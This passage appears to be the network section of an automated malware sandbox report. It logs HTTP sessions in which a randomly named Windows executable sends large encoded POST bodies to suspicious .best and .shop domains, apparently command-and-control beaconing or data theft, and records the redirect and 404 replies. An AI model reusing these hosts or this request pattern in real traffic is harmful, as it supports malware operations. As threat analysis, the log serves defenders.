                                                CF-RAY: 8b99d5af5d5bc5a1-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.11.2049856172.67.191.241807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:20.236553907 CEST1289OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 53 49 63 50 77 61 30 33 57 6c 4a 35 37 79 4e 55 37 46 73 4b 64 42 35 36 55 55 45 4c 39 6d 57 64 79 53 56 4b 54 2b 65 4f 4f 79 45 68 61 72 70 55 4f 65 30 58 48 59 53 4a 6d 7a 54 6c 30 77 34 4f 50 52 76 63 78 69 72 70 4a 57 64 57 6d 5a 73 6f 31 61 70 41 56 38 38 39 39 59 61 37 57 62 35 57 62 79 44 44 50 42 49 32 44 6b 55 64 50 6b 6e 58 74 57 32 4d 76 52 4e 66 48 6a 41 6b 73 37 38 45 69 58 6c 31 6a 6d 30 79 76 51 4a 54 4c 38 77 44 33 68 6a 4e 48 62 7a 74 4d 4e 72 6e 62 63 4b 32 51 6b 78 5a 41 57 2f 73 6e 54 52 6d 33 4a 43 6b 4f 79 4a 73 52 69 4a 44 2f 66 6d 75 36 53 75 32 33 4b 35 67 43 6d 57 51 46 57 6b 2b 55 55 58 42 58 59 4b 49 2b 71 4a 38 46 78 52 50 73 62 75 78 31 76 55 59 65 62 76 69 32 52 30 2b 4a 71 48 52 46 77 75 74 76 48 61 2b 36 64 48 7a 55 78 39 42 34 65 39 47 44 46 32 43 6e 76 69 32 78 54 56 35 6f 54 4f 4c 75 6c 48 79 4d 72 6d 42 44 75 6f 6d 73 [TRUNCATED]
                                                Data Ascii: ij60MtY=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3SIcPwa03WlJ57yNU7FsKdB56UUEL9mWdySVKT+eOOyEharpUOe0XHYSJmzTl0w4OPRvcxirpJWdWmZso1apAV8899Ya7Wb5WbyDDPBI2DkUdPknXtW2MvRNfHjAks78EiXl1jm0yvQJTL8wD3hjNHbztMNrnbcK2QkxZAW/snTRm3JCkOyJsRiJD/fmu6Su23K5gCmWQFWk+UUXBXYKI+qJ8FxRPsbux1vUYebvi2R0+JqHRFwutvHa+6dHzUx9B4e9GDF2Cnvi2xTV5oTOLulHyMrmBDuomsmjWrca8iGGZXfhgVXx8HpnsDygBV5FHOsMfOiajqQ+idX/pTMO83XF+exlElKAVI/Fy7i2Hbywht/8RKucuv47wueBt1Wl7cPkGUIFRpU0lnI9NVzZ508QGi32JCUIWkmBO+rwCV4KP+Hz8MfYt5bpdKPqnqUEryshPO6RGUTvvL53/grakBjjRq8J2aoxeMY6aFxsXthKEn2CYmQNVho+eupBW/PVWLaXYkHGcW5BQJqvhoF/jASUG14xRJESd7vLHrbN03HCy6oM/UT21J9Pzs0ItP83e0qCFl+xbrXCdi/MOF4u9EWnyAPyjySw
                                                Aug 27, 2024 07:59:20.236601114 CEST1289OUTData Raw: 67 30 6b 69 62 51 33 4b 39 51 53 37 4d 6d 49 4f 47 50 2f 4c 61 4f 41 7a 61 34 52 51 77 6c 61 6a 76 70 6b 32 48 32 63 6a 66 68 39 4d 78 47 34 74 73 59 49 65 6a 52 65 30 55 48 42 74 33 6f 47 34 4b 45 71 65 51 38 71 42 32 6a 47 74 73 4b 75 78 31 79
                                                Data Ascii: g0kibQ3K9QS7MmIOGP/LaOAza4RQwlajvpk2H2cjfh9MxG4tsYIejRe0UHBt3oG4KEqeQ8qB2jGtsKux1yXm7CqmJppY9cwfwhKLvlHf5xGDQXyy+LC0Cl7yYMedYCeXY/OXl0D046JeLYf/iXKLm7pJJHudPuKFfxWFe8IQFcASJqTsVWq7vfjA0pd+VPteldpEhmNG3IX2yGEHR4xPgVE7m5fxNiqVXOAdr3tHfKFSVy5scsL
                                                Aug 27, 2024 07:59:20.236653090 CEST10312OUTData Raw: 4c 49 55 43 45 34 31 45 67 58 4f 67 49 59 59 4b 6e 37 32 32 66 75 30 63 6e 68 31 72 57 68 70 69 67 68 74 67 75 50 70 4c 52 4e 51 76 71 64 4a 4b 64 6b 48 41 53 4a 76 79 39 6a 6c 55 65 4a 32 65 6e 62 68 33 44 6e 79 57 32 75 46 6a 6d 31 78 47 37 37
                                                Data Ascii: LIUCE41EgXOgIYYKn722fu0cnh1rWhpightguPpLRNQvqdJKdkHASJvy9jlUeJ2enbh3DnyW2uFjm1xG77O+NdCsiqgYlo4502REh3/1MyGvHdXICtWQJj8XS5YGhRnyBb/g3pzi1TFoPA6LrwFN7bav9H0lmgyLDY/LuUvkGldiq8WXNbwn05G5ZyasqnBdzVIXM5ADIZLiU2QrGiE0zXH18fjtV/k4XeGVTlE9pP/njGJC22R
                                                Aug 27, 2024 07:59:20.337133884 CEST2578OUTData Raw: 63 53 6f 77 2b 56 74 53 75 51 72 56 47 65 46 2b 6e 32 79 78 38 39 36 57 64 64 56 67 73 76 77 6f 33 5a 75 36 46 47 6e 66 76 71 74 31 4d 55 7a 30 2b 6c 65 6b 54 50 59 49 56 6a 7a 6b 37 38 74 55 72 70 32 57 4b 76 6d 64 57 4a 30 33 6f 4a 4a 46 73 45
                                                Data Ascii: cSow+VtSuQrVGeF+n2yx896WddVgsvwo3Zu6FGnfvqt1MUz0+lekTPYIVjzk78tUrp2WKvmdWJ03oJJFsE/lbGBSScZBZbnadenmGtEpz0KnmL5szzSMcXOmzeOO4HwVSL0KwD9EPruaqOEDHmvR99CcSouFEi1aSpLIh2fm4M4oufviDvfhZvIQgnyQyXaPiGuUdOh2ZPypZn3QAvJS397VVlhE13B9vKCmI+aci/2FQRPwaoU
                                                Aug 27, 2024 07:59:20.337284088 CEST1289OUTData Raw: 4e 53 53 74 73 43 74 6c 66 78 34 4f 38 72 53 4f 77 5a 31 6e 6c 66 72 78 37 46 59 69 7a 38 63 57 57 36 6a 57 32 74 2f 7a 62 6a 4e 4f 69 35 45 6e 68 33 61 41 79 66 32 46 42 57 43 43 4e 7a 44 67 50 41 63 45 77 58 42 4b 76 36 78 37 6a 61 43 78 31 58
                                                Data Ascii: NSStsCtlfx4O8rSOwZ1nlfrx7FYiz8cWW6jW2t/zbjNOi5Enh3aAyf2FBWCCNzDgPAcEwXBKv6x7jaCx1Xm/+CMFfAjvihkrr0YV4Xqnqti1ChpGuFKdhVl5xVtp7sbJ/FGcyVxvLJWktAJb3QFEfb4BrMwyQ9i/HZl2mfgD85dgJ/hmjmJxcJ2sqp1YMbh2g4TIJPNEC2S/ti2sHvU0/Ejx70OJJEDwxP73sgdyRm8ARx2+BqM
                                                Aug 27, 2024 07:59:20.337455034 CEST3867OUTData Raw: 41 78 6b 51 4b 49 78 4c 33 4a 34 55 65 68 71 55 67 66 59 5a 41 78 43 4b 36 6d 55 75 77 30 4d 33 49 4a 30 6f 4b 37 6f 4b 52 4a 70 4c 49 4e 64 54 58 47 61 41 69 33 76 44 4a 49 6a 57 7a 6f 58 6e 67 4f 4b 66 45 4c 44 57 62 77 51 48 75 76 33 49 6f 42
                                                Data Ascii: AxkQKIxL3J4UehqUgfYZAxCK6mUuw0M3IJ0oK7oKRJpLINdTXGaAi3vDJIjWzoXngOKfELDWbwQHuv3IoBFNCKCntunWML9lz4RIrGKpJk3viZg/Qd3xSKaFGSmfqN1yFchbZLwwg7xdf0rmNdWd5A1HVwva4AUCVhylMgHZiBHqIsMKywUq2IMbie2KwNJ3/PPQ076bKIPm0ph4ECeSHkSie6tVo051TnE1+4Zm9rMbDPpEBRv
                                                Aug 27, 2024 07:59:20.337625027 CEST5156OUTData Raw: 69 59 59 69 61 30 5a 6b 6c 44 58 71 70 6f 64 2b 55 64 4a 62 6f 67 77 58 32 30 62 61 6b 6a 77 56 53 43 79 50 5a 70 2b 63 64 4e 30 63 4e 49 66 36 5a 58 66 76 74 57 31 37 75 61 52 4c 53 76 49 75 53 70 41 6f 79 4c 57 35 58 48 48 51 78 48 64 44 51 72
                                                Data Ascii: iYYia0ZklDXqpod+UdJbogwX20bakjwVSCyPZp+cdN0cNIf6ZXfvtW17uaRLSvIuSpAoyLW5XHHQxHdDQr7fxDS1FY92ajp4mpYRD1zJHMv1Ljr7F3yT5vCtfyBXkcMem96YfWzSDpRw4hHmJleMRbxFV/aHOTV/6lBnbzSu64PGaYsGt6LCjtkW3zilt8o1aZmDTmDOj6AptjPiLLCSkuNBIt+DtGpQZoS9viELU1eBaHlJT07
                                                Aug 27, 2024 07:59:20.337799072 CEST10312OUTData Raw: 30 75 6b 74 76 6a 46 51 32 38 4a 42 68 7a 38 33 59 4a 69 33 31 72 45 79 68 53 45 72 50 39 39 76 67 33 6c 70 2b 6c 33 47 70 76 42 36 52 51 78 47 53 48 64 39 71 54 56 76 74 47 4b 58 2f 4e 6d 4a 54 33 6d 59 51 30 38 6a 6a 49 64 4b 6e 66 45 63 78 33
                                                Data Ascii: 0uktvjFQ28JBhz83YJi31rEyhSErP99vg3lp+l3GpvB6RQxGSHd9qTVvtGKX/NmJT3mYQ08jjIdKnfEcx3EiA3Tg336G7/c/SVAzpk2cwqqIxppXBdAFeiXOK+ov5drgYAXMKKbK/hp+sFtiAHGoP1/Zsqri0ypLNQLlFso9R+4jHrWw8D/A4P4YoGj6jTlu7X2JGSE88JRV8RsbMhjwkTSN0W90TCeDkXBMs4MHOZ1xIrXIiYv
                                                Aug 27, 2024 07:59:20.337987900 CEST2578OUTData Raw: 56 38 34 76 6a 36 41 53 6f 42 46 54 55 30 71 67 73 58 42 35 4c 43 73 32 61 72 61 35 52 66 6f 55 4a 44 4b 4e 75 37 5a 48 77 46 46 49 64 44 67 47 6d 57 70 32 43 56 44 50 4b 4e 36 4f 55 48 31 73 31 4b 63 2f 56 49 50 74 38 30 77 36 44 49 55 68 2b 6b
                                                Data Ascii: V84vj6ASoBFTU0qgsXB5LCs2ara5RfoUJDKNu7ZHwFFIdDgGmWp2CVDPKN6OUH1s1Kc/VIPt80w6DIUh+kIotdtNSLdcbY0NoRy1mCLCHcOVaMaAnv0R4CGdUfyOIEjNNdbjlx394hfDpVPb2XHe4jDrrBlrgQTwBlKYUcCQTQVsF0ODwBfSc21OHs/tXfjihLwWo8ScKjPCG8vOCdfh6V+Tp4FeYtC0b0njQyUtxMB+nAcu/b4
                                                Aug 27, 2024 07:59:20.351413012 CEST865INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:20 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCKk1nnDbvdpS19%2F%2FbMfTs92mCPUa2nrVQjD5Grc%2FupYJHzy4LWbRSxMx7hyQ7860XGWleobzltx2qLMSSQ9wWKB5lHZHeYdX23UPJcuGkZhtB4ZOlnSUkf23fdb%2FqkJtdLt4WnHIaplzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99d5bfcd10690c-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.11.2049857172.67.191.241807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:22.873028994 CEST553OUTGET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:22.989088058 CEST979INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:22 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gxosQdTKMOWHY81giBzW83%2BRUuh7HAZzQKyS353OtKTIwlO5dloKpgDiluPBqbV57GbsQSmuRwYHJoCuyWcNCeHrszL507sIVIufvcVvaDL4tDYdAyWvU9L3Gmj7MHZ5SOJRwIbbga0B%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d5d04cb52d1c-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.11.2049858172.67.166.145807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:28.217051983 CEST832OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 79 58 63 43 43 36 43 46 6a 6c 33 79 42 2b 62 4c 31 71 66 4d 6c 59 6e 4a 72 37 6b 6c 31 4d 47 76 5a 6f 2f 4b 7a 33 62 4e 73 6d 6b 36 6c 43 33 70 2f 4c 74 41 54 69 46 73 38 4d 6b 73 4b 7a 58 72 77 67 56 58 61 48 50 34 32 45 58 4e 5a 6d 48 34 4e 2f 7a 31 53 55 70 52 41 75 4e 65 69 6a 75 67 6c 37 42 58 6b 79 64 59 57 73 4a 72 46 46 7a 64 64 54 30 42 59 7a 66 4b 2f 47 63 53 70 36 4e 72 64 66 5a 73 4f 31 2b 4a 67 65 6a 2f 6f 72 4f 62 32 57 44 32 2f 55 31 7a 30 56 6a 64 53 51 4e 63 32 45 78 75 38 39 46 75 2f 62 59 48 65 53 58 36 78 4b 64 77 41 3d 3d
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                Aug 27, 2024 07:59:28.482920885 CEST746INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:28 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqcH3EsNJ%2FvQrU2gP3cU0QokFncPJLtZuuOchMPmwPJyzDJU%2B3Jqub4uItKEVaHJe8V62bIJhKuLB6Yo4PNF4ZceW0iQsTFFPFPtog%2B3cZ6E2YkGK5qIUd51Uie3TF2P2OC5yuHcdUsj"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d5f1bec2884b-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                Aug 27, 2024 07:59:28.482933998 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.11.2049859172.67.166.145807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:30.858716965 CEST1172OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 63 47 73 38 4d 2f 4a 79 33 62 45 38 6d 6b 78 46 43 79 30 76 4c 69 41 54 75 33 73 39 77 6b 73 4a 50 58 74 43 34 56 41 36 48 4d 7a 57 45 55 45 35 6d 4b 38 4e 2f 70 31 53 59 66 52 45 79 4e 65 54 50 75 6a 6e 54 42 54 32 4b 65 56 57 73 4c 2b 56 46 77 50 64 53 31 42 66 37 58 4b 36 44 70 53 66 4b 4e 72 2b 58 5a 69 75 31 39 51 41 65 67 7a 49 71 4b 57 58 58 7a 7a 39 67 45 33 6e 74 77 54 42 55 58 66 57 67 49 76 50 4e 66 78 4d 36 6d 4e 65 37 68 36 41 47 5a 67 55 51 52 76 53 5a 70 4e 33 52 42 46 36 51 4d 68 4e 31 76 77 35 57 54 53 49 74 77 39 51 75 52 4b 5a 69 67 6c 5a 6c 41 69 47 4c 61 42 33 52 39 53 2b 73 6f 56 53 34 32 67 41 7a 39 78 54 65 6d 45 76 42 6c 71 36 33 79 44 31 59 5a 6c 48 4d 6c 7a 46 75 73 78 68 47 73 34 6e 35 4c 70 7a 6a 64 36 51 52 76 6f 6b 6b 5a 64 2b 41 64 35 6c 39 57 56 7a 39 41 4c 45 67 2b 76 4d 6a 77 7a 39 64 38 75 41 77 4d 64 4c 72 4d 68 41 [TRUNCATED]
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXtC4VA6HMzWEUE5mK8N/p1SYfREyNeTPujnTBT2KeVWsL+VFwPdS1Bf7XK6DpSfKNr+XZiu19QAegzIqKWXXzz9gE3ntwTBUXfWgIvPNfxM6mNe7h6AGZgUQRvSZpN3RBF6QMhN1vw5WTSItw9QuRKZiglZlAiGLaB3R9S+soVS42gAz9xTemEvBlq63yD1YZlHMlzFusxhGs4n5Lpzjd6QRvokkZd+Ad5l9WVz9ALEg+vMjwz9d8uAwMdLrMhAII04ZNH+jpTqTN+Xgf+Miso3I3haq7D585zczZ0cppJwlAhIPEel7Y2E4zTaDHaw7HAvL7tsBiScry4EBwQ6EhBWOftE8cZktyKVD4w2xp7/mnwCunmr8mzx2EXj2o/0U7pYyU9rmzKRxu/1lLT2PqoIWtjjMvI3U0wBf4RV4gVjeL+obxvQ9OIuiT/q8Cdnsw0B/zsrFjQ2A=
                                                Aug 27, 2024 07:59:31.128812075 CEST744INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:31 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kcd1Ew68jj6NNftWAh5NTr2Fdkr12H40vqxgVzDcd6TSt35EqTcKsznW2861yDMjIG%2Bhr2jrzqBN5X%2BCjD6ElEuHu8MXPCXeFtRprp3YRwm%2FjclUHyLikx9x2XLTIrPCWFND7t5N1IjU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d6023b642d1b-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                Aug 27, 2024 07:59:31.128827095 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.11.2049860172.67.166.145807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:33.499574900 CEST2578OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
